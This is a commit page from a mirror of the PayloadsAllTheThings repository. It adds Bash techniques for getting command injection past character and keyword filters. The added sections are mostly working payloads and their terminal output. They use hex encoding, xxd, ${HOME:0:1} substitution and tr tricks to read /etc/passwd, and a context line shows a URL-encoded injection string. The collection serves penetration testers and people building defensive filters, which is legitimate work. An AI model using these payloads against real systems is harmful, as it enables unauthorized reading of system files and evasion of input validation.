ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #165 from HLOverflow/master

Browse Source 
More Bash tricks to bypass Command Injection filtering
This commit is contained in:
Swissky 2020-03-14 18:45:55 +01:00 committed by GitHub
commit 57b500b48e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 53 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

53
Command Injection/README.md
View File

@ -12,6 +12,7 @@
* [Filter Bypasses](#filter-bypasses)
* [Bypass without space](#bypass-without-space)
* [Bypass with a line return](#bypass-with-a-line-return)
* [Bypass characters filter via hex encoding](#bypass-characters-filter-via-hex-encoding)
* [Bypass blacklisted words](#bypass-blacklisted-words)
* [Bypass with single quote](#bypass-with-single-quote)
* [Bypass with double quote](#bypass-with-double-quote)
@ -108,6 +109,58 @@ ping%PROGRAMFILES:~10,-5%IP
something%0Acat%20/etc/passwd
```
### Bypass characters filter via hex encoding
linux
```
swissky@crashlab▸ ~ ▸ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ xxd -r -p <<< 2f6574632f706173737764
/etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -p <<< 2f6574632f706173737764`
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
/etc/passwd
swissky@crashlab▸ ~ ▸ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash
```
### Bypass characters filter
Commands execution without backslash and slash - linux bash
```
swissky@crashlab▸ ~ ▸ $ echo ${HOME:0:1}
/
swissky@crashlab▸ ~ ▸ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab▸ ~ ▸ $ echo . | tr '!-0' '"-1'
/
swissky@crashlab▸ ~ ▸ $ tr '!-0' '"-1' <<< .
/
swissky@crashlab▸ ~ ▸ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash
```
### Bypass Blacklisted words
#### Bypass with single quote